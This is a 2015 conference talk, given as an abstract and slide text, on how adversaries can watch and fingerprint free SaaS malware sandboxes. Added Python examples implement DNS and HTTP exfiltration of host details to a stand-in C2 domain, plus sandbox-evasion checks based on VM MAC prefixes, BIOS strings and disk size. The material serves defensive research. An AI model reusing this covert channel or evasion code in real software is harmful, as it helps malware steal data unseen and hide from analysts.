Anyone attending this conference knows the usefulness of running malware in a sandbox to perform triage, speed up analysts' workflow, extract indicators of compromise (IOCs), and gather information useful for detection and mitigation. When analysts do this, what are the OPSEC concerns about tipping off the adversary? Which sandbox providers are better than others in this regard? In this talk we present research that takes an adversarial view of the free and widely used SaaS malware sandboxes. When an adversary's malware is detonated in a sandbox, what network artifacts can they see? Can they identify the sandbox provider from the network traffic alone? How do malware and related IOCs submitted to these sandboxes propagate to security companies and ultimately to threat intelligence feeds? In this talk we answer these questions and more.
An Adversarial View of SaaS Malware Sandboxes
1. An Adversarial View of SaaS Sandboxes
Jason Trost
Aaron Shelmire
Oct 17th 2015
2. whoami
Jason Trost
• VP of Threat Research @ ThreatStream
• Previously at Sandia, DoD, Booz Allen, Endgame Inc.
• Background in Big Data Analytics, Security Research, and Machine Learning
Aaron Shelmire
• Senior Threat Researcher @ ThreatStream
• Previously at CERT, Secure Works CTU-SO, CMU
• Background in Incident Response, Forensics, Security Research
3. Motivation
• AV is Dead!
• Threat Intelligence Feeds
• You’re going to tip off the adversary!!!
• Everyone’s going to know I’m compromised
• Advanced Malware Detects Sandboxes!
4. Experiment
• Created sensors with unique CampaignIDs
• Encoded execution time and CampaignIDs in domain names
• Tornado HTTP app and BIND DNS servers as the C2 side
• Submitted the sensors to 29 free online sandboxes
• Watched the traffic roll in
8. Sensor C2 – HTTP POST
• Exfil via HTTP POST
• zlib compression
• base64 encoded
• Worked pretty well, but…
9. Sensor C2 – DNS Covert Channel
• Some sandboxes block TCP connections
• Most allow DNS unmodified
• zlib compression
• hex encode
• split data into chunks
• multiple DNS A requests
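Both sensor channels from slides 8 and 9, as an added example written for this page rather than the authors' sensor code: the HTTP body is JSON, zlib-compressed and base64-encoded; the DNS channel takes the same compressed bytes, hex-encodes them, cuts them into labels of at most 63 characters and emits one A query per chunk under a campaign-tagged name. The server side rebuilds the record from the query names it observed and tolerates retries, reordering and queries cut short by the sandbox. The zone `x.sensor-c2.example`, the name layout `<idx>-<total>.<hexchunk>.<campaign>.<zone>` and the sensor record contents are assumptions for the example, not the real domains or format used in the research.

```python
import base64
import json
import re
import zlib
from collections import defaultdict

# Hypothetical C2 zone; the real sensors used their own registered domains.
C2_DOMAIN = "x.sensor-c2.example"
MAX_LABEL = 63   # RFC 1035: a single DNS label is at most 63 octets
MAX_NAME = 253   # practical limit for a full domain name

# Constructed sensor record, shaped like the host features reported in the talk.
SAMPLE_RECORD = {
    "campaign": "c42", "ts": 1445000000, "username": "admin", "hostname": "PC-1",
    "cpus": 1, "ram": 1024, "disk_gb": 19.99, "bios": "VMware",
    "mac_addr": "00:50:56:aa:bb:cc",
}


def encode_http_post(record: dict) -> bytes:
    """HTTP channel body: JSON -> zlib -> base64 (usable where the sandbox allows outbound TCP)."""
    raw = json.dumps(record, sort_keys=True).encode()
    return base64.b64encode(zlib.compress(raw, 9))


def decode_http_post(body: bytes) -> dict:
    """Server side of the HTTP channel."""
    return json.loads(zlib.decompress(base64.b64decode(body)))


def encode_dns_queries(record: dict, campaign_id: str, domain: str = C2_DOMAIN) -> list:
    """DNS channel: JSON -> zlib -> hex -> 63-char chunks -> one A query name per chunk.

    Name layout (assumed): <idx>-<total>.<hexchunk>.<campaign>.<domain>, so resolver
    logs carry the campaign id and the server can reorder chunks that arrive out of order.
    """
    hexdata = zlib.compress(json.dumps(record, sort_keys=True).encode(), 9).hex()
    chunks = [hexdata[i:i + MAX_LABEL] for i in range(0, len(hexdata), MAX_LABEL)]
    names = []
    for idx, chunk in enumerate(chunks):
        name = f"{idx}-{len(chunks)}.{chunk}.{campaign_id}.{domain}"
        if len(name) > MAX_NAME:
            raise ValueError("query name too long; shorten the campaign id or zone")
        names.append(name)
    return names


def reassemble_dns(query_names, domain: str = C2_DOMAIN) -> dict:
    """Server side: rebuild records from observed query names, keyed by campaign id.

    Duplicates (resolver retries), out-of-order arrival and unrelated queries are
    tolerated; a campaign with missing chunks (sample killed early) is left out
    rather than decoded wrongly.
    """
    pattern = re.compile(
        r"^(\d+)-(\d+)\.([0-9a-f]+)\.([a-z0-9-]+)\." + re.escape(domain.lower()) + r"\.?$"
    )
    parts = defaultdict(dict)   # campaign -> {idx: hexchunk}
    totals = {}
    for qname in query_names:
        m = pattern.match(qname.lower())   # DNS names are case-insensitive
        if not m:
            continue
        idx, total, chunk, campaign = int(m[1]), int(m[2]), m[3], m[4]
        parts[campaign][idx] = chunk
        totals[campaign] = total
    records = {}
    for campaign, chunks in parts.items():
        total = totals[campaign]
        if set(chunks) != set(range(total)):
            continue   # incomplete transfer
        hexdata = "".join(chunks[i] for i in range(total))
        try:
            records[campaign] = json.loads(zlib.decompress(bytes.fromhex(hexdata)))
        except (ValueError, zlib.error):
            continue   # garbled chunk, e.g. a label mangled by an intermediate resolver
    return records


if __name__ == "__main__":
    names = encode_dns_queries(SAMPLE_RECORD, "c42")
    print(len(names), "A queries, first one:", names[0])
    print(reassemble_dns(names + ["www.example.com"]))
```

Each chunk label here is raw hex, which is why a single record costs several queries; the same split-and-index layout works with base32 labels for roughly 20% fewer queries, at the cost of a less obviously readable name in the resolver logs that the talk relies on for attribution.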
12. Eventually…
• VirusTotal: 6 Samples
• Detection ranges from 8/57 to 30/57
• A lot of Trojan Zusy and Trojan Graftor
• More malicious as time went on
13. Sharing?
• Yup, lots
• Samples shared
  • Evidence of new executions seen from different origins
• Domain names shared
  • Previous executions’ domains resolved later by other orgs, from different nameservers
  • Some domains appear on threat intel lists
• Many orgs are trivially identified as security companies
  • Every major AV company is represented in our DNS logs
  • Several security product companies
15. Threat Intel vs the Sandbox IPs?
• Of all the sandbox IPs that made valid POST requests to our server, 15 were also identified in some threat intelligence feeds as malicious
  • 6 were TOR IPs
  • 1 was an anonymous proxy
  • All others were characterized as:
    • Bot IPs
    • Spammer IPs
    • Brute force IPs
    • Scanning IPs
    • Compromised IPs (Hawkeye Keylogger, Dyre)
• Interesting, but not surprising
16. Tipping off the adversary
[Chart: sensor check-in timeline; annotations: 1st Submission, 2nd Submission, Monday Morning, DNS C2]
17. Check In Activity
[Chart: check-in activity over time; annotations: Trend Micro + Home Hosts, Monday Morning – Everyone checks in, Amazon + Google, DNS C2]
20. Sandbox detection features
• System services lists
• Processes – VBoxService (1), vmtools (8)
• MAC address
  • VMware, Inc. (55), Cadmus Computer Systems (40), ASUSTek COMPUTER INC. (23)
• BIOS
  • VMware (50), Bochs (34), ASUS (23), Google (8), Qemu (8)
• Disk size
  • 19.99GB (52), 25GB (37), 120GB (28), 50GB (20), 39GB (20)
• RAM
  • 1GB (92), 1.5GB (18), 512MB (10)
• Was the EXE renamed?
  • sample.exe, malware.exe, ${md5}.exe
21. Way too Advanced!!!! – Virtual Machine Sharing
• Many companies, but only a few virtual machines used!
  • Same usernames
  • Same hostnames
  • Same disk size
  • Same CPU count
• Generic detection that works 90% of the time:
  • ( CPU Count == 1 or Disk Size <= 60 GB ) or no running Web Browser
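The fingerprinting features from slide 20 and the generic rule from slide 21, as an added example written for this page (not the authors' sensor code): it scores a collected host profile against the tells the slides list, and implements the slide's generic rule separately so the two can be compared. The OUI prefixes (00:50:56, 00:0c:29, 00:05:69 for VMware; 08:00:27 for Cadmus Computer Systems, the OUI VirtualBox assigns to its NICs), the guest-tools process names and the `innotek GmbH` BIOS string are standard values and not taken from the slides; the two host profiles at the bottom are constructed.

```python
import re
from dataclasses import dataclass

# IEEE OUI prefixes behind the vendor counts on slide 20.
VM_OUIS = {
    "00:50:56": "VMware, Inc.",
    "00:0c:29": "VMware, Inc.",
    "00:05:69": "VMware, Inc.",
    "08:00:27": "Cadmus Computer Systems",   # VirtualBox virtual NICs
}
# Guest-tools service processes (VBoxService / VMware Tools on the slide).
VM_PROCESSES = {"vboxservice.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe"}
# BIOS manufacturer strings; "google" is Compute Engine firmware, "innotek" is VirtualBox
# (innotek is not on the slide, added here as an assumption about the same check).
VM_BIOS_PREFIXES = ("vmware", "bochs", "qemu", "innotek", "google")
BROWSERS = {"chrome.exe", "firefox.exe", "iexplore.exe", "msedge.exe"}
# Sandboxes commonly rename the submitted file to sample.exe, malware.exe or <md5>.exe.
RENAMED_EXE = re.compile(r"^(sample|malware|[0-9a-f]{32})\.exe$", re.IGNORECASE)


@dataclass
class HostProfile:
    cpu_count: int
    disk_gb: float
    ram_mb: int
    mac_addr: str
    bios_vendor: str
    processes: list
    exe_name: str


def sandbox_indicators(h: HostProfile) -> list:
    """Return every individual sandbox tell found in a host profile (empty list if none)."""
    hits = []
    oui = h.mac_addr.lower().replace("-", ":")[:8]
    if oui in VM_OUIS:
        hits.append(f"mac_oui:{VM_OUIS[oui]}")
    procs = {p.lower() for p in h.processes}
    hits += [f"process:{p}" for p in sorted(procs & VM_PROCESSES)]
    if h.bios_vendor.lower().startswith(VM_BIOS_PREFIXES):
        hits.append(f"bios:{h.bios_vendor}")
    if RENAMED_EXE.match(h.exe_name):
        hits.append(f"renamed_exe:{h.exe_name}")
    if h.cpu_count == 1:
        hits.append("cpu_count:1")
    if h.disk_gb <= 60:
        hits.append(f"small_disk:{h.disk_gb}GB")
    if h.ram_mb <= 1024:
        hits.append(f"low_ram:{h.ram_mb}MB")
    if not procs & BROWSERS:
        hits.append("no_browser")
    return hits


def looks_like_sandbox(h: HostProfile) -> bool:
    """Slide 21's generic rule: (CPU count == 1 or disk <= 60 GB) or no running web browser."""
    procs = {p.lower() for p in h.processes}
    return h.cpu_count == 1 or h.disk_gb <= 60 or not (procs & BROWSERS)


# Constructed profiles: one shaped like the shared sandbox image, one like a real workstation.
SANDBOX_HOST = HostProfile(1, 19.99, 1024, "00:0c:29:3a:4b:5c", "VMware, Inc.",
                           ["explorer.exe", "vmtoolsd.exe", "svchost.exe"], "sample.exe")
WORKSTATION = HostProfile(4, 476.0, 16384, "b4:2e:99:01:02:03", "American Megatrends Inc.",
                          ["explorer.exe", "chrome.exe", "outlook.exe"], "Q3-report.exe")

if __name__ == "__main__":
    for label, host in (("sandbox", SANDBOX_HOST), ("workstation", WORKSTATION)):
        print(label, looks_like_sandbox(host), sandbox_indicators(host))
```

The generic rule is deliberately crude; its false positives are small single-core VMs and servers without a browser, which is exactly the population of analyst VMs and jump hosts a defender would not want the malware to go quiet on.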
22. Lessons
• Most people use the same Sandbox Images
• AV thinks your file is malicious
• You will tip off the adversary
• Everyone will hit their network touch points … forever …
• Malware sandboxes can be fingerprinted with simple techniques
• You get what you pay for
23. Contact
Jason Trost
• @jason_trost
• jason [dot] trost [AT] threatstream [dot] com
Aaron Shelmire
• @Ashelmire
• aaron[dot] shelmire [AT] threatstream [dot] com
Editor's Notes
-- Daily resolutions of the campaign domains, per campaign and resolving org
select timestamp::DATE, campaign_id, org, COUNT(1)
from network_activity
where host ILIKE '%.x.vpnlogin-it-helpdesk.com'
group by 1, 2, 3
order by 3, 1, 2;
These 3 domains were associated with 3 different campaigns (data sharing is obvious here).
3 domains associated with this project showed up on commercial threat intelligence feeds.
None of the file hashes showed up.
-- BIOS manufacturer counts across check-ins that carried a host profile
select data_parsed->'bios'->>'manufacturer', COUNT(1)
from c2_logs c
where data_parsed::TEXT != '{}'
  and (data_parsed->>'username') IS NOT NULL
group by 1
order by 2;
-- RAM in GB across check-ins that carried a host profile
select (data_parsed->>'ram')::INTEGER / 1024 as RAM, COUNT(1)
from c2_logs c
join ip_metadata m on (c.client_ip = m.ip)
where data_parsed::TEXT != '{}'
  and (data_parsed->>'username') IS NOT NULL
  and (data_parsed->>'ram')::INTEGER > 0
group by 1
order by 2;
-- MAC OUI (first 8 characters, e.g. 00:50:56) counts, excluding our own test campaigns;
-- joined against http://standards-oui.ieee.org/oui.txt for the vendor names
select SUBSTR(data_parsed->>'mac_addr', 0, 9), COUNT(1)
from c2_logs c
join ip_metadata m on (c.client_ip = m.ip)
where data_parsed::TEXT != '{}'
  and (data_parsed->>'username') IS NOT NULL
  and campaign_id NOT IN ('TEST', 'JT', 'OG')
group by 1
order by 2;